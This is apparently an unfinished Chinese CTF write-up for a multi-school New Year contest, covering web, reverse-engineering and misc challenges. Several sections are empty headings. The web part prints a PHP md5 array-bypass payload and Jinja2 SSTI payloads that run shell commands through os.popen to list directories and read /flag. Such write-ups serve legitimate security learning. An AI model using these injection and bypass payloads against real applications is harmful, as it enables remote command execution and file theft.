0
点赞
收藏
分享

微信扫一扫

新春杯八校联赛

IT程序员 2022-02-13 阅读 20

还没写完.......

有错误见谅...............................

参考原比赛wp:腾讯文档

WEB

题目一:一行代码的签到

题目源码:


 <?php
//只有一行的签到
echo !(!(include "flag.php")||(!error_reporting(0))||!isset($_GET['BYE'])||!isset($_GET['HELLO'])||($_GET['BYE']==2021)||!(intval($_GET['BYE'][0])==2021)||$_GET['HELLO']==$_GET['BYE']||!(md5($_GET['HELLO'])==md5($_GET['BYE'])))?$flag:str_repeat(highlight_file(__FILE__), 0);

知识点:

intval函数特性:intval() 函数用于获取变量的整数值

md5数组绕过:md5不能加密数组,传入数组会报错,但会继续执行并且返回结果为null

弱类型比较(==),只判断内容是否相等,如果是字符串类型,则转换成数值型后进行判断

三目运算符:echo !()?xxx:yyy,若为true则用echo xxx,若为false则echo yyy.

||连接各个条件

分析

整个条件

!(!(include "flag.php")||(!error_reporting(0))||!isset($_GET['BYE'])||!isset($_GET['HELLO'])||($_GET['BYE']==2021)||!(intval($_GET['BYE'][0])==2021)||$_GET['HELLO']==$_GET['BYE']||!(md5($_GET['HELLO'])==md5($_GET['BYE'])))

因为需要整个条件为真才输出flag,可以看见括号最前面加上了!,就需要括号里面的条件为假

1.($_GET['BYE']==2021)==>BYE不能为2021

2.!(intval($_GET['BYE'][0])==2021)==>BYE的整数值为2021

3.$_GET['HELLO']==$_GET['BYE']==>HELLO和BYE变量不能相等

4.!(md5($_GET['HELLO'])==md5($_GET['BYE']))==>在HELLO和BYE变量后加上[],变成数组,即null=null,绕过

payload:

?HELLO[]=2021A&BYE[]=2021a

题目二 e4zy_flask

Hint:/admin?name=1 https://xz.aliyun.com/t/8029#toc-8

进入页面

转到admin页面

/admin

get传参发现可以ssti

/admin?name=49

 

看看根目录

admin/?name={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}}

 发现有flag

?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20/flag%27).read()%20}}

 flag

flag{SST1_YoU_kNow_1t_A1way5_5O_Easy}

题目三 baby_SQL

题目四 TP_serialize

REVERSE

题目一 RE Check In

 IDA打开flag.exe,发现main函数里有串字符串

BASE64解码得到flag

题目二 Easy RE

题目三 Dynamic Reverse

MISC

题目一 享受美妙的音乐吧

解压文件得到一个wav音频和一个压缩包,压缩包有密码,先看音频

放到Audacity看,没发现什么

然后发现是sstv转图片,先切换输出设备,再打开sstv转图片

发现图片上的字“我磕的CP是最甜的!”,是压缩包密码,解压出音频

听了发现是一首歌,放到Audacity看,同样没啥东西

那就应该是隐藏了文件,找下看 ,DeepSound找到里面有个txt

打开看到最后有个零,而且列数很多,应该是零宽隐写

用解密网址解密得到flag

题目二 超简单

用的ps拼接二维码,扫出来得到一串字符

V20xNGFGb3pkSE5qTVRoNFpFWTVlbVJZUW14amJEbDZZVmN4ZDJKSFZTOW1VVDA5

先md5,再BASE64,得到flagflag{ls_1t_super_simple?}

题目三 来个套餐

解压文件,得到一个hint.txt和一个带密码的压缩包

看看hint.txt,发现可能是爆破压缩包的字典,试试

爆破成功,解压压缩包

发现是培根密码

解密大写解压错误,小写解压成功,tiersxqxyhdcbsnervfy

解压

Ook解密

解压得到一张图

放到010里看

看属性,发现flag:flag{He110_everyone_1m#tired@of_Amway}

题目四 今天也是爱阿瑶的一天呀

 解压文件,得到两张图,一个hint.txt,提示了金光瑶的生日,身高,最下面还提示带单位

举报

相关推荐

0 条评论